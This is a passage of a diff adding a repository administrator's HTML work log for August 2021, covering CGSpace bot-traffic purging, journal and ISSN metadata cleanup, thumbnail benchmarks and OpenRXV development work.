+<li>Open <a href="https://github.com/ilri/OpenRXV/issues/111">an issue for the value mappings global replacement bug in OpenRXV</a></li>
+<li>Advise Peter and Abenet on expected CGSpace budget for 2022</li>
+<li>Start a fresh harvesting on AReS (linode20)</li>
+</ul>
+<h2 id="2021-08-02">2021-08-02</h2>
+<ul>
+<li>Help Udana with OAI validation on CGSpace
+<ul>
+<li>He was checking the OAI base URL on OpenArchives and I had to verify the results in order to proceed to Step 2</li>
+<li>Now it seems to be verified (all green): <a href="https://www.openarchives.org/Register/ValidateSite?log=R23ZWX85">https://www.openarchives.org/Register/ValidateSite?log=R23ZWX85</a></li>
+<li>We are listed in the OpenArchives list of databases conforming to OAI 2.0</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-03">2021-08-03</h2>
+<ul>
+<li>Run fresh re-harvest on AReS</li>
+</ul>
+<h2 id="2021-08-05">2021-08-05</h2>
+<ul>
+<li>Have a quick call with Mishell Portilla from CIP about a journal article that was flagged as being in a predatory journal (Beall&rsquo;s List)
+<ul>
+<li>We agreed to unmap it from RTB&rsquo;s collection for now, and I asked for advice from Peter and Abenet for what to do in the future</li>
+</ul>
+</li>
+<li>A developer from the Alliance asked for access to the CGSpace database so they can make some integration with PowerBI
+<ul>
+<li>I told them we don&rsquo;t allow direct database access, and that it would be tricky anyways (that&rsquo;s what APIs are for!)</li>
+</ul>
+</li>
+<li>I&rsquo;m curious if there are still any requests coming in to CGSpace from the abusive Russian networks
+<ul>
+<li>I extracted all the unique IPs that nginx processed in the last week:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.6 /var/log/nginx/access.log.7 /var/log/nginx/access.log.8 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2021-08-05-all-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/2021-08-05-all-ips.txt
+</span></span><span style="display:flex;"><span>43428 /tmp/2021-08-05-all-ips.txt
+</span></span></code></pre></div><ul>
+<li>Already I can see that the total is much less than during the attack on one weekend last month (over 50,000!)
+<ul>
+<li>Indeed, now I see that there are no IPs from those networks coming in now:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2021-08-05-all-ips.txt -o /tmp/2021-08-05-all-ips.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-08-05-all-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/2021-08-05-all-ips-to-purge.csv
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-05-all-ips-to-purge.csv
+</span></span><span style="display:flex;"><span>0 /tmp/2021-08-05-all-ips-to-purge.csv
+</span></span></code></pre></div><h2 id="2021-08-08">2021-08-08</h2>
+<ul>
+<li>Advise IWMI colleagues on best practices for thumbnails</li>
+<li>Add a handful of mappings for incorrect countries, regions, and licenses on AReS and start a new harvest
+<ul>
+<li>I sent a message to Jacquie from WorldFish to ask if I can help her clean up the incorrect countries and regions in their repository, for example:</li>
+<li>WorldFish countries: Aegean, Euboea, Caribbean Sea, Caspian Sea, Chilwa Lake, Imo River, Indian Ocean, Indo-pacific</li>
+<li>WorldFish regions: Black Sea, Arabian Sea, Caribbean Sea, California Gulf, Mediterranean Sea, North Sea, Red Sea</li>
+</ul>
+</li>
+<li>Looking at the July Solr statistics to find the top IP and user agents, looking for anything strange
+<ul>
+<li>35.174.144.154 made 11,000 requests last month with the following user agent:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
+</span></span></code></pre></div><ul>
+<li>That IP is on Amazon, and from looking at the DSpace logs I don&rsquo;t see them logging in at all, only scraping&hellip; so I will purge hits from that IP</li>
+<li>I see 93.158.90.30 is some Swedish IP that also has a normal-looking user agent, but never logs in and requests thousands of XMLUI pages, I will purge their hits too
+<ul>
+<li>Same deal with 130.255.162.173, which is also in Sweden and makes requests every five seconds or so</li>
+<li>Same deal with 93.158.90.91, also in Sweden</li>
+</ul>
+</li>
+<li>3.225.28.105 uses a normal-looking user agent but makes thousands of request to the REST API a few seconds apart</li>
+<li>61.143.40.50 is in China and uses this hilarious user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}&#34;
+</span></span></code></pre></div><ul>
+<li>47.252.80.214 is owned by Alibaba in the US and has the same user agent</li>
+<li>159.138.131.15 is in Hong Kong and also seems to be a bot because I never see it log in and it downloads 4,300 PDFs over the course of a few hours</li>
+<li>95.87.154.12 seems to be a new bot with the following user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (compatible; MaCoCu; +https://www.clarin.si/info/macocu-massive-collection-and-curation-of-monolingual-and-bilingual-data/
+</span></span></code></pre></div><ul>
+<li>They have a legitimate EU-funded project to enrich data for under-resourced languages in the EU
+<ul>
+<li>I will purge the hits and add them to our list of bot overrides in the mean time before I submit it to COUNTER-Robots</li>
+</ul>
+</li>
+<li>I see a new bot using this user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nettle (+https://www.nettle.sk)
+</span></span></code></pre></div><ul>
+<li>129.0.211.251 is in Cameroon and uses a normal-looking user agent, but seems to be a bot of some sort, as it downloaded 900 PDFs over a short period.</li>
+<li>217.182.21.193 is on OVH in France and uses a Linux user agent, but never logs in and makes several requests per minute, over 1,000 in a day</li>
+<li>103.135.104.139 is in Hong Kong and also seems to be making real requests, but makes way too many to be a human</li>
+<li>There are probably more but that&rsquo;s most of them over 1,000 hits last month, so I will purge them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 10796 hits from 35.174.144.154 in statistics
+</span></span><span style="display:flex;"><span>Purging 9993 hits from 93.158.90.30 in statistics
+</span></span><span style="display:flex;"><span>Purging 6092 hits from 130.255.162.173 in statistics
+</span></span><span style="display:flex;"><span>Purging 24863 hits from 3.225.28.105 in statistics
+</span></span><span style="display:flex;"><span>Purging 2988 hits from 93.158.90.91 in statistics
+</span></span><span style="display:flex;"><span>Purging 2497 hits from 61.143.40.50 in statistics
+</span></span><span style="display:flex;"><span>Purging 13866 hits from 159.138.131.15 in statistics
+</span></span><span style="display:flex;"><span>Purging 2721 hits from 95.87.154.12 in statistics
+</span></span><span style="display:flex;"><span>Purging 2786 hits from 47.252.80.214 in statistics
+</span></span><span style="display:flex;"><span>Purging 1485 hits from 129.0.211.251 in statistics
+</span></span><span style="display:flex;"><span>Purging 8952 hits from 217.182.21.193 in statistics
+</span></span><span style="display:flex;"><span>Purging 3446 hits from 103.135.104.139 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 90485
+</span></span></code></pre></div><ul>
+<li>Then I purged a few thousand more by user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
+</span></span><span style="display:flex;"><span>Found 2707 hits from MaCoCu in statistics
+</span></span><span style="display:flex;"><span>Found 1785 hits from nettle in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 4492
+</span></span></code></pre></div><ul>
+<li>I found some CGSpace metadata in the wrong fields
+<ul>
+<li>Seven metadata in dc.subject (57) should be in dcterms.subject (187)</li>
+<li>Twelve metadata in cg.title.journal (202) should be in cg.journal (251)</li>
+<li>Three dc.identifier.isbn (20) should be in cg.isbn (252)</li>
+<li>Three dc.identifier.issn (21) should be in cg.issn (253)</li>
+<li>I re-ran the <code>migrate-fields.sh</code> script on CGSpace</li>
+</ul>
+</li>
+<li>I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]&#39;</span> /tmp/2021-08-08-cgspace.csv &gt; /tmp/2021-08-08-issn-isbn.csv
+</span></span></code></pre></div><ul>
+<li>Then in OpenRefine I merged all null, blank, and en fields into the <code>en_US</code> one for each, removed all spaces, fixed invalid multi-value separators, removed everything other than ISSN/ISBNs themselves
+<ul>
+<li>In total it was a few thousand metadata entries or so so I had to split the CSV with <code>xsv split</code> in order to process it</li>
+<li>I was reminded again how DSpace 6 is very fucking slow when it comes to any database-related operations, as it takes over an hour to process 200 metadata changes&hellip;</li>
+<li>In total it was 1,195 changes to ISSN and ISBN metadata fields</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-09">2021-08-09</h2>
+<ul>
+<li>Extract all unique ISSNs to look up on Sherpa Romeo and Crossref</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;cg.issn[en_US]&#39;</span> ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c <span style="color:#ae81ff">1</span> -r <span style="color:#e6db74">&#39;^[0-9]{4}&#39;</span> | sed 1d | sort | uniq &gt; /tmp/2021-08-09-issns.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
+</span></span></code></pre></div><ul>
+<li>Then I updated the CSV headers for each and joined the CSVs on the issn column:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/sherpa romeo journal title/&#39;</span> /tmp/2021-08-09-journals-sherpa-romeo.csv
+</span></span><span style="display:flex;"><span>$ sed -i <span style="color:#e6db74">&#39;1s/journal title/crossref journal title/&#39;</span> /tmp/2021-08-09-journals-crossref.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv &gt; /tmp/2021-08-09-journals-all.csv
+</span></span></code></pre></div><ul>
+<li>In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(cells[&#39;sherpa romeo journal title&#39;].value == cells[&#39;crossref journal title&#39;].value,&#34;same&#34;,&#34;different&#34;)
+</span></span></code></pre></div><ul>
+<li>Then I exported the list of journals that differ and sent it to Peter for comments and corrections
+<ul>
+<li>I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it</li>
+</ul>
+</li>
+<li>Convert my <code>generate-thumbnails.py</code> script to use libvips instead of Graphicsmagick
+<ul>
+<li>It is faster and uses less memory than GraphicsMagick (and ImageMagick), and produces nice thumbnails from PDFs</li>
+<li>One drawback is that libvips uses Poppler instead of Graphicsmagick, which apparently means that it can&rsquo;t work in CMYK</li>
+<li>I tested one item (10568/51999) that uses CMYK and the thumbnail looked OK (closer to the original than GraphicsMagick), so I&rsquo;m not sure&hellip;</li>
+<li>Perhaps this is not a problem after all, see this PR from 2019: <a href="https://github.com/libvips/libvips/pull/1196">https://github.com/libvips/libvips/pull/1196</a></li>
+</ul>
+</li>
+<li>I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s-vips.jpg[Q=85,optimize_coding,strip]&#39;</span>
+</span></span><span style="display:flex;"><span>39004:0.08
+</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e gm convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -quality <span style="color:#ae81ff">85</span> -thumbnail x600 -flatten IPCC-gm.jpg 
+</span></span><span style="display:flex;"><span>40932:0.53
+</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert IPCC.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
+</span></span><span style="display:flex;"><span>41724:0.59
+</span></span><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality <span style="color:#ae81ff">85</span> -thumbnail 600x600 IPCC-im.jpg
+</span></span><span style="display:flex;"><span>24736:0.04
+</span></span></code></pre></div><ul>
+<li>The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
+<ul>
+<li>libvips does use less time and memory&hellip; I should do more tests!</li>
+<li>I wonder if I can try to use these <a href="https://github.com/criteo/JVips/blob/master/src/test/java/com/criteo/vips/example/SimpleExample.java">unofficial Java bindings</a> in DSpace</li>
+<li>The authors of the JVips project wrote a nice blog post about libvips performance: <a href="https://medium.com/criteo-engineering/boosting-image-processing-performance-from-imagemagick-to-libvips-268cc3451d55">https://medium.com/criteo-engineering/boosting-image-processing-performance-from-imagemagick-to-libvips-268cc3451d55</a></li>
+<li>Ouch, JVips is Java 8 only as far as I can tell&hellip; that works now, but it&rsquo;s a non-starter going forward</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-11">2021-08-11</h2>
+<ul>
+<li>Peter got back to me about the journal title cleanup
+<ul>
+<li>From his corrections it seems an overwhelming majority of his choices match the Sherpa Romeo version of the titles rather than Crossref&rsquo;s</li>
+<li>Anyways, I exported the originals that were the same in Sherpa Romeo and Crossref as well as Peter&rsquo;s selections for where Sherpa Romeo and Crossref differred:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d &gt; /tmp/journals1.txt
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;sherpa romeo journal title&#39;</span> ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d &gt; /tmp/journals2.txt
+</span></span><span style="display:flex;"><span>$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
+</span></span><span style="display:flex;"><span>1911
+</span></span></code></pre></div><ul>
+<li>Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine</li>
+<li>I exported a list of all the journal titles we have in the <code>cg.journal</code> field:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT(text_value) AS &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
+</span></span><span style="display:flex;"><span>COPY 3245
+</span></span></code></pre></div><ul>
+<li>I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don&rsquo;t match, so I&rsquo;d have to go check many of them manually before selecting a match or fixing them&hellip;
+<ul>
+<li>I think it&rsquo;s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way</li>
+<li>Or instead of doing it via SQL I could use CSV and parse the values there&hellip;</li>
+</ul>
+</li>
+<li>A few more issues:
+<ul>
+<li>Some ISSNs are non-existent in Sherpa Romeo and Crossref, but appear on issn.org&rsquo;s web search (their API is invite only)</li>
+<li>Some titles are different across all three datasets, for example ISSN 0003-1305:
+<ul>
+<li><a href="https://portal.issn.org/resource/ISSN/0003-1305">According to ISSN.org</a> this is &ldquo;The American statistician&rdquo;</li>
+<li><a href="https://v2.sherpa.ac.uk/id/publication/20807">According to Sherpa Romeo</a> this is &ldquo;American Statistician&rdquo;</li>
+<li><a href="https://search.crossref.org/?q=0003-1305&amp;from_ui=yes&amp;container-title=The+American+Statistician">According to Crossref</a> this is &ldquo;The American Statistician&rdquo;</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I also realized that our previous controlled vocabulary came from CGSpace&rsquo;s top 500 journals, so when I replaced it with the generated list earlier today we lost some journals
+<ul>
+<li>Now I went back and merged the previous with the new, and manually removed duplicates (sigh)</li>
+<li>I requested access to the issn.org OAI-PMH API so I can use their registry&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-12">2021-08-12</h2>
+<ul>
+<li>I sent an email to Sherpa Romeo&rsquo;s help contact to ask about missing ISSNs
+<ul>
+<li>They pointed me to their <a href="https://v2.sherpa.ac.uk/romeo/about.html">inclusion criteria</a> and said that missing journals should submit their open access policies to be included</li>
+</ul>
+</li>
+<li>The contact from issn.org got back to me and said I should pay 1,000/year EUR for 100,000 requests to their API&hellip; no thanks</li>
+<li>Submit a pull request to COUNTER-Robots for the httpx bot (<a href="https://github.com/atmire/COUNTER-Robots/pull/45">#45</a>)
+<ul>
+<li>In the mean time I added it to our local ILRI overrides</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-15">2021-08-15</h2>
+<ul>
+<li>Start a fresh reindex on AReS</li>
+</ul>
+<h2 id="2021-08-16">2021-08-16</h2>
+<ul>
+<li>Meeting with Abenet and Peter about CGSpace actions and future
+<ul>
+<li>We agreed to move three top-level Feed the Future projects into one community, so I created one and moved them:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/72600
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/35730
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/76451
+</span></span></code></pre></div><ul>
+<li>I made a minor fix to OpenRXV to prefix all image names with <code>docker.io</code> so it works with less changes on podman
+<ul>
+<li>Docker assumes the <code>docker.io</code> registry by default, but we should be explicit</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-17">2021-08-17</h2>
+<ul>
+<li>I made an initial attempt on the policy statements page on DSpace Test
+<ul>
+<li>It is modeled on Sherpa Romeo&rsquo;s OpenDOAR policy statements advice</li>
+</ul>
+</li>
+<li>Sit with Moayad and discuss the future of AReS
+<ul>
+<li>We specifically discussed formalizing the API and documenting its use to allow as an alternative to harvesting directly from CGSpace</li>
+<li>We also discussed allowing linking to search results to enable something like &ldquo;Explore this collection&rdquo; links on CGSpace collection pages</li>
+</ul>
+</li>
+<li>Lower case all AGROVOC metadata, as I had noticed a few in sentence case:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 484
+</span></span></code></pre></div><ul>
+<li>Also update some DOIs using the <code>dx.doi.org</code> format, just to keep things uniform:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 469
+</span></span></code></pre></div><ul>
+<li>Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    322m16.917s
+</span></span><span style="display:flex;"><span>user    226m43.121s
+</span></span><span style="display:flex;"><span>sys     3m17.469s
+</span></span></code></pre></div><ul>
+<li>I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39;</span> <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    -H &#39;Content-Type: application/json&#39; \
+</span></span><span style="display:flex;"><span>    -d &#39;{
+</span></span><span style="display:flex;"><span>    &#34;size&#34;: 10,
+</span></span><span style="display:flex;"><span>    &#34;query&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;bool&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;filter&#34;: {
+</span></span><span style="display:flex;"><span>                &#34;term&#34;: {
+</span></span><span style="display:flex;"><span>                    &#34;repo.keyword&#34;: &#34;CGSpace&#34;
+</span></span><span style="display:flex;"><span>                }
+</span></span><span style="display:flex;"><span>            }
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    }
+</span></span><span style="display:flex;"><span>}&#39;
+</span></span><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ==&#39;</span>
+</span></span></code></pre></div><ul>
+<li>This uses the Elasticsearch scroll ID to page through results
+<ul>
+<li>The second query doesn&rsquo;t need the request body because it is saved for 1 day as part of the first request</li>
+</ul>
+</li>
+<li>Attempt to re-do my tests with VisualVM from 2019-04
+<ul>
+<li>I found that I can&rsquo;t connect to the Tomcat JMX port using SSH forwarding (visualvm gives an error about localhost already being monitored)</li>
+<li>Instead, I had to create a SOCKS proxy with SSH (ssh -D 8096), then set that up as a proxy in the VisualVM network settings, and then add the JMX connection</li>
+<li>See: <a href="https://dzone.com/articles/visualvm-monitoring-remote-jvm">https://dzone.com/articles/visualvm-monitoring-remote-jvm</a></li>
+<li>I have to spend more time on this&hellip;</li>
+</ul>
+</li>
+<li>I fixed a bug in the Altmetric donuts on OpenRXV
+<ul>
+<li>We now <a href="https://github.com/ilri/OpenRXV/pull/113">try to show the donut for the DOI first if it exists, then fall back to the Handle</a></li>
+<li>This is working on my local test, but not on the live site&hellip; sigh</li>
+<li>I started a fresh harvest, maybe it&rsquo;s something to do with the metadata in Elasticsearch</li>
+</ul>
+</li>
+<li>I improved the quality of the &ldquo;no thumbnail&rdquo; placeholder image on AReS: <a href="https://github.com/ilri/OpenRXV/pull/114">https://github.com/ilri/OpenRXV/pull/114</a></li>
+<li>I sent some feedback to some ILRI and CCAFS colleagues about how to use better thumbnails for publications</li>
+</ul>
+<h2 id="2021-08-24">2021-08-24</h2>
+<ul>
+<li>In the last few days I did a lot of work on OpenRXV
+<ul>
+<li>I started exploring the Angular 9.0 to 9.1 update</li>
+<li>I tested some updates to dependencies for Angular 9 that we somehow missed, like @tinymce/tinymce-angular, @nicky-lenaers/ngx-scroll-to, and @ng-select/ng-select</li>
+<li>I changed the default target from ES5 to ES2015 because ES5 was released in 2009 and the only thing we lose by moving to ES2015 is IE11 support</li>
+<li>I fixed a handful of issues in the Docker build and deployment process</li>
+<li>I started exploring changing the Docker configuration from using volumes to <code>COPY</code> instructions in the <code>Dockerfile</code> because we are having sporadic issues with permissions in containers caused by copying the host&rsquo;s frontend/backend directories and not being able to write to them</li>
+<li>I tested moving from node-sass to sass, as it has been <a href="https://blog.ninja-squad.com/2019/05/29/angular-cli-8.0/">supported since Angular 8 apparently</a> and will allow us to avoid stupid node-gyp issues</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-08-25">2021-08-25</h2>
+<ul>
+<li>I did a bunch of tests of the OpenRXV Angular 9.1 update and merged it to master (<a href="https://github.com/ilri/OpenRXV/pull/115">#115</a>)</li>
+<li>Last week Maria Garruccio sent me a handful of new ORCID identifiers for Bioversity staff
+<ul>
+<li>We currently have 1320 unique identifiers, so this adds eleven new ones:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-08-25-combined-orcids.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-25-combined-orcids.txt
+</span></span><span style="display:flex;"><span>1331
+</span></span></code></pre></div><ul>
+<li>After I combined them and removed duplicates, I resolved all the names using my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
+</span></span></code></pre></div><ul>
+<li>Tag existing items from the Alliance&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code> (181 new metadata fields added):</li>
+</ul>
